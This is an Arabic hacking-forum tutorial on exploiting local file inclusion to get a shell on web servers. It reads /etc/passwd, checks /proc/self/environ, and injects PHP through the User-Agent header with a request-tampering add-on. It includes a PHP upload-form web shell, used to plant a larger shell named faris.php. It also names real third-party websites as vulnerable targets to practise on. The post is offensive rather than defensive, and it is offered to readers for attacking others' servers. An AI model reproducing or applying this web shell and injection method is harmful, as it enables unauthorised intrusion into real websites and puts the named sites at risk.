السلام عليكم ورحمة الله وبركاته
موضوعنا اليوم عن
الحصول على شل عن
طريق ثغرات local file include
طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات
ولو دخلت على اى موقع
ثغرات تلقاها اكتر من السكيول
لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير
وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها
عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر
الأدوات الأول
1 - متصفح فير فوكس (أكيد عند كله)
2 - إضافة mozilla sniffer
https://addons.mozilla.org/en-US/firefox/addon/176005/
3 - فتح دماغك معايا شويه بس
نبدأ الشرح
ده مثال لموقع مصاب بثغرة lfi
http://www.iowaarboretum.org/index.p.../etc/passwd%00
وده موقع للتطبيق فى حالتنا
http://falalalalights.net/site/index...elf/environ%00
على سبيل المثال لا الحصر
نشوف هنعمل ايه
أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم)
المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت
احنا بقى هنعمل ايه
هنحقن المجلد ده بشل بسيط الاوا
وعن
طريق الشل البسيط نرفع شل كبير
نشوف ازاى
ده المسار اللى بنجيب منه اليوزرات
http://www.site.com/index.php?option.../etc/passwd%00
وخلى بالك من علامة %00 اللى فى الاخر دى
مهمه جدا
طيب بعد منطلب الملف ده النتيجه هتبقى كده
[
تمام لحد كده الموقع مصاب وزى الفل
نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات
ازاى بقى يا حلو
هنغير /etc/passwd ب /proc/self/environ
http://www.site.com/index.php?option...elf/environ%00
لو كان الناتج زى كده
يبقى متفعله وزى الفل
طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت
طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه
يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه
اوك
لقيناه متفعل هنعمل ايه
نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده
مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا
كود:
<?php
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_****'], $_FILES['file']['****'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?> تم ارفاق الشل
نشوف بقى هنحقنه ازاى
بعد متسطب الاداه mozilla sniffer
تفتحها من الفاير فوكس عن
طريق tools > mozilla sniffer
وبعدين تضغط start sniff
طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض
اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol
طيب
ضغطنا start sniff
افتح بقى السايت تانى طبعا السايت ده
http://www.site.com/index.php?option...elf/environ%00
واختار tamper
تلقى جاك حاجه زى دى
لاحظ المحدد بازرق اللى هو user agent
حط مكانه كود الشل الموجود فوق
واتكى ok
تمام كده تلاقى الصفحه ظهر فيها فورم رفع
زى ده
لول
ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش
بعد متضغط ابلود
اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع
واضغط اوك
تمام كده انا رفعت الشل باسم faris.php
تروح بقى على السايت مباشر وتضيف يعدها اسم الشل
توضيح
انا كنت شغال هنا
http://www.site.com/index.php?option...elf/environ%00
يبقى الشل هنا
http://www.site.com/faris.php
والنتيجه
مبروووك
lol
انتهى الشرح
اتمنى يكون واضح
وأى استفسارات انا جاهز
HaCKeR-MaN k: